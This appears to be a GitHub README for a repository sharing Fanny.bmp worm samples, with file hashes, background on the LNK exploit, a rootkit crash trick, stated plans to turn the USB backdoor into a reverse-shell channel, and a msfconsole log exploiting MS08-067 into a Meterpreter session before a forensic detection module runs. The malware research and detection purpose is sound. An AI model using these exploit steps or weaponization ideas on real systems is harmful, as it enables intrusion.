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- Related to
- (In)Directly related to the nls_933w.dll file
I made yet another Branch "only_malware" which ONLY CONTAINS THE FANNY.BMP MALWARE
please find it here only_malware⚠️
- Q:
why did I use the 'runas' dialog to demonstrate the rootkit?
- A:
cuz I wanted to show it does work on some text-inputs, as well
And another screenshot:
Note! the technical report I wrote has a few* painfully-obvious flaws (like being written in a hurry, so it has some* grammar errors) the report will be re-written and re-publicized as the same with a new version number. This new version, will be much better in general. And more Related to the actual research I did on the malware rather than the malware in general.
I have quite little time on my hands now, so it will be delayd (this is just how I am).
Instead of having all the text (literally, all text) shown all at once, I decided to make clickable
(if clicking doesn't work, please refer to the raw
version of the readme or check it on another device)
the most important things related to this repo is (most notably) My contribution(this repo) to the Rapid7 project(Metasploit);
Basic Info
FannyBMP or as the codename, DementiaWheel.
FannyBMP or as the codename, DementiaWheel
Is a worm that exploited zero day vulns
(more specifically, the LNK Exploit CVE-2010-2568).
Which allowed it to spread (via usb) even if USB Autorun was turned off.
This is the same(although somewhat more obfuscated) exploit that was used in StuxNet.
- 2010-2568
POC's (Proof Of Concepts)
d.lnk - 148300b4c895bef313bee5eea9f40956510bc1e3878917cdd22baeabefb91179
e.lnk - 276df113d13feaa98602918e09168ee4caadd3b797fdf7fcbe268f5741861bfa
f.lnk - 8e1f99b858010fbf664419404a465ae98b51b40acc94231609367beca8e1652d
g.lnk - 6735dfcf86a0268e880429ebcc0062baa5515eaba69fd45cf4ea42b23f8e5809
h.lnk - be1fd5a117142d2a80b6798058f66a0abea796986dae29e7902e6b0fe461a605
i.lnk - 86f24cd880f445890c54883a40947fe103cceb92d5d3b17e7a9cf8143cdd04c9
j.lnk - 3696b414d8eaaaea4a9d220226e0e2ed458853eb1546959765aef8ccc0ba37b9
comhost.dll - 0d9bb9a9e3a6f8836a1ef51862ae1c28f086da3a9006d1c7040fe57ed8c26231
mscorwin.dll - ef3135e462540adfba00234d75c4b21430f5a9037b61e7dc1014c8711ddc0047
shelldoc.dll - 6eb00b34d1daffa49b2f4c90841705b2c994563bde672bf35eb1c46cdb19a1ed
ECELP4.ACM - 787419d07f4bda9bc91072bb8644ed943089ad44f4bb5920bfe452dc111c244d
fanny.bmp - 0d9bb9a9e3a6f8836a1ef51862ae1c28f086da3a9006d1c7040fe57ed8c26231
~DE1923.tmp - c69a9157638e69fb692d827383c3f27e586e0c98989cffdf8bd4c982ad837a4c
AGENTCPD.DLL - 1e77ae780e3f6389ffd6eae92887e531bf156943e31302c93be08a57ea90e6dd
dll_installer.dll [will provide soon (this is the inner module of Fanny.BMP)]
☢️ Still unsorted (sorting it at the moment) ☢️
not-done ⚠️
--- please note that documentation(writing) (as below) is not my strongest front; so please this will be fuzzy; hopefully readable. -----
as I will upload and make it all very cleanly organized; with screenshots; and everything in one place(or, Hopefully I will be able to at least, make it decently well)
thanks for understanding! have a good day!
I will (when I am done with the OSCP Exam, which is very soon! it actually is on 18th Jan! (writing from 2021 25 Dec (Happy Christmas! :) ))) Soon create & upload the following:
- Recording (From scratch(0%), to 100%) of when Fanny.bmp infects a PLC (although.. It does not do anything, or even "infects a PLC" but, it detects PLC's in a kinda-similar way StuXNet did.) (although a virtual one, since I have not real access to a nuclear reactor.. For.. well, quite - obvious reasons.
- Recording (again, From 0 to 100%) of how one can "re-weaponize" Fanny.bmp (or,DementiaWheel as it's codename suggests) the USB-Backdoor to carry commands from & to Metasploit. (This is tested and, let's just say - it works, but needs improvement. (Massive improvements that is)) <- Still working on it.
- A mini-library written in C (in combination with Lua) to make (the 2 points above ) a bit more user-friendly
- (JUST so you don't need to be a debugger-professional to understand how to get a reverse shell trough fanny's USB Backdoor for example.)
For the story Refer to both the article(s) I've been provided below, but also - if you're interested; read my theory fanny.bmp's and StuXNet's purpose in the ISSUES page. "The Purpose of Fanny.bmp - in relation to StuXNet #7 "
(that I do not think is known? At least probably not to the developers that made fanny.bmp, although this is probably quite expected, that it would hide files using the prefix the rootkit is designed to just "hide").
But the unexpected thing was "to me anyway" that, it crashed explorer (and, the whole XP) while doing this.) This is done by "using" the rootkit provided in fanny.bmp.
watch the video (youtube)
If you name a folder/file/shortcut " _ _ e _ _ . l n k " (Note: Explorer will make the file not-displayed when you type e) and then, hopefully - it will crash with an error message. Or 2 error messages by the way.
###As well as the video file itself, here:
The screenshot of the "empty" (not infected by fanny) USB (that, was "experimented" with and later, as well infected by fanny.bmp) Displaying the files that the rootkit tried to hide, but it crashed explorer.exe with 2 error messages instead.
2 Error messages from fanny.bmp while it's rootkit was in use (and tried to hide a file/directory created by the user, called "e.lnk" in this example)
you can now use my metasploit module avail. here:
the module avail. here: at the wiki
- Windows XP Pro (SP3) Screenshot:
- Windows 10 Pro N (x64) Screenshot:
All these I thought of earlier providing, since I was one of the people that got this on my USB stick (my USB got infected long long time ago, Years ago now.) - But now - when I looked closer and I saw that some of these isn't even available online (Some of them are, still - like fanny.bmp and maybe some others, and ECELP4.acm) but not any of mscorwin / comhost, etc. (If they are - I would love to hear that! and the source of it. The more sources of same malware - the better. It strengthens the "community" if I can put it that way. And it is easier to find if all material is gathered at one place. But I thought of providing all of these to malware researchers. As well as for academical purposes.
Note: In the video I provided, I had slight problems with the USB Keyboard. So I wrote "EDUCATIONAK" but meant "EDUCATIONAL". Contact me for any details.
(Q) Why would you want to upload malware? You're literally providing CyberWeapons! (A) I believe in Open-Source, and that even though in this scenario, can hopefully help malware researchers provide better protection.
But the major point, is actually - as said above, but adding the following reason:
- to help the feature find these malware and samples. As I think there are very little (if not none) of these easily accessible online. (Samples that is)
- (And some the others) at "Indicators of compromise (“one of each”):"
- To detect it in Registry
And (for "optional" reading) I would suggest this one: "AiR-ViBeR: Exfiltrating Data from Air-GappedComputers via Covert Surface ViBrAtIoNs." - writeup about Stuxnet,Fanny, Agent.btz (which is really like each others in ways)
First, Git clone the fanny_bmp_check.rb from Metasploit! (Now - always go to metasploit (oficially) to get the fanny.bmp module. To always get the latest version of it. In which I believe is vital when we talk security)
place it into your msf folder, (important, check the following step before placing it) usually located in /root/.msf4/modules/
- make the following folders: (under each other) /post/windows/gather/forensics/ <fanny_bmp_check.rb here>
Start msfconsole
use exploit/windows/smb/ms08_067_netapi
set RHOST and LHOST.
msf6 exploit(windows/smb/ms08_067_netapi) > run
[*] Started reverse TCP handler on
[*] - Automatically detecting the target...
[*] - Fingerprint: Windows XP - Service Pack 3 - lang:English
[*] - Selected Target: Windows XP SP3 English (AlwaysOn NX)
[*] - Attempting to trigger the vulnerability...
[*] Sending stage (175174 bytes) to
[*] Meterpreter session 4 opened ( -> at 2020-12-22 16:55:02 +0100
meterpreter > run post/windows/gather/forensics/fanny_bmp_check
[*] Searching registry on WORKSTATION1 for Fanny.bmp artifacts.
[+] WORKSTATION1: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\MediaResources\acm\ECELP4\Driver found in registry.
[+] WORKSTATION1: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\MediaResources\acm\ECELP4\filter2 found in registry.
[+] WORKSTATION1: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\MediaResources\acm\ECELP4\filter3 found in registry.
[+] WORKSTATION1: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\MediaResources\acm\ECELP4\filter8 found in registry.
[*] WORKSTATION1: 4 result(s) found in registry.